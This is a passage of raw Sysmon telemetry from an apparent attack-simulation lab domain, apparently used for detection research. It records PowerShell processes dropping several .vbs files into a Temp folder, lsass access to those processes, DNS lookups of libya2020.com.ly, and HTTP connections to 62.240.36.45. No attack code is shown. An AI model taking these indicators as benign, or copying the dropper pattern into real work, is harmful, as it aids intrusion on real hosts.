08:03:05.529{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B539-615A-7E02-00000000FC01}8404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108021Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.529{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B539-615A-7E02-00000000FC01}8404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108020Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.530{58E9C193-B539-615A-7E02-00000000FC01}8404C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108019Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.451{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B218033FDF08653CF3F6D43B7D8BA9EB,SHA256=2D725D42AD43D20EC7A5B2C24A382C298E3F3F41D2191F6FCA378767E7ED0171,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000108018Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.342{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ad.vbs2021-10-04 08:03:05.341 11241100x8000000000000000108017Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.328{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\love01.vbs2021-10-04 08:03:05.328 11241100x8000000000000000108016Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.328{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs2021-10-04 08:03:05.327 11241100x8000000000000000108015Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.280{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\lovefhdfhdf.vbs2021-10-04 08:03:05.279 11241100x8000000000000000108014Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.271{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\nono.vbs2021-10-04 08:03:05.271 10341000x8000000000000000108013Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.229{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108012Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.229{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108011Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.227{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108010Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.224{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108009Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.217{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108008Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.216{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108007Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.160{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108006Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.160{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108005Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.117{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F155CFADEB88B5FED3BA1B160307BBE,SHA256=FF59EC3E2FCAC7FE3D95F3192EC70A779F8EBFAF4D019DCB9DDBD545F0139312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108004Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.110{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108003Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.110{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108002Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.078{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108001Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.078{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108000Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.073{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107999Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.070{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107998Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.060{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107997Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.060{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000107996Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:05.052{58E9C193-B538-615A-7C02-00000000FC01}2956\PSHost.132778081847767356.2956.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000107995Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.019{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580E5FFCB8B1F4CA3AB38BF51A743ADB,SHA256=9A4A399B2142C920E4DEA61F455A37E93A2DF7E1AD02742315A605BEDE5E2E01,IMPHASH=00000000000000000000000000000000falsetrue 17141700x8000000000000000107994Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:05.019{58E9C193-B538-615A-7402-00000000FC01}7400\PSHost.132778081847314287.7400.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x8000000000000000107993Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:03:05.003{58E9C193-B538-615A-7702-00000000FC01}7376\PSHost.132778081847427222.7376.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000108036Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:06.647{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3AD18BBC1824D93D07820BF7C1816C36,SHA256=8CD52004D96E2E58BEB9F81BABDD44593C99521CA45539F3851F14D8495A1594,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108035Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:06.645{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE639636706AD08C54FFDA8445C41DEA,SHA256=C236D665C3F2A1C23E0B4C5D28C08CF5446F651E6A66D81E61DCB4B05159C1CC,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000108034Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.544{58E9C193-B538-615A-6D02-00000000FC01}6984libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000108033Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:06.045{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7EE727A556A001C635477EA990EBB70,SHA256=753E5695326AA52FFFE4C7F9C965961E0219367860191DC2DFF049C16390C241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083663Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:06.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B12860C853DFA7F05E1512942D9482AB,SHA256=B7A48D58D3ACA868EABB9E628ABC04365703A8F8E8E161AD25A66BDCCE2B962F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083665Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:07.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD4642491333D76C9ACC7804188B24F6,SHA256=0F018051FEDEDDAE2A1B0F551DD13DB6E4AE91F942CDE676A51611B6197FE76D,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000108046Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.607{58E9C193-B538-615A-7C02-00000000FC01}2956libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000108045Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.596{58E9C193-B538-615A-7702-00000000FC01}7376libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000108044Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.596{58E9C193-B538-615A-7402-00000000FC01}7400libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000108043Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.550{58E9C193-B538-615A-6B02-00000000FC01}7816libya2020.com.ly0::ffff:62.240.36.45;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 354300x8000000000000000108042Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.651{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51937-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000108041Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.641{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51936-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000108040Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.641{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51935-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000108039Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.587{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51934-false62.240.36.45vweb10.lttnet.net80http 354300x8000000000000000108038Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:05.582{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51933-false62.240.36.45vweb10.lttnet.net80http 23542300x8000000000000000108037Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:07.050{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964E5962061E4F57278D0C6EFA5F26CC,SHA256=362D8872EC3E733730A2E0DC8A47DDE06F59206D4C423CAD26D5BB92A5537934,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083664Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:04.739{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50184-false10.0.1.12-8000- 23542300x800000000000000083666Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:08.511{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 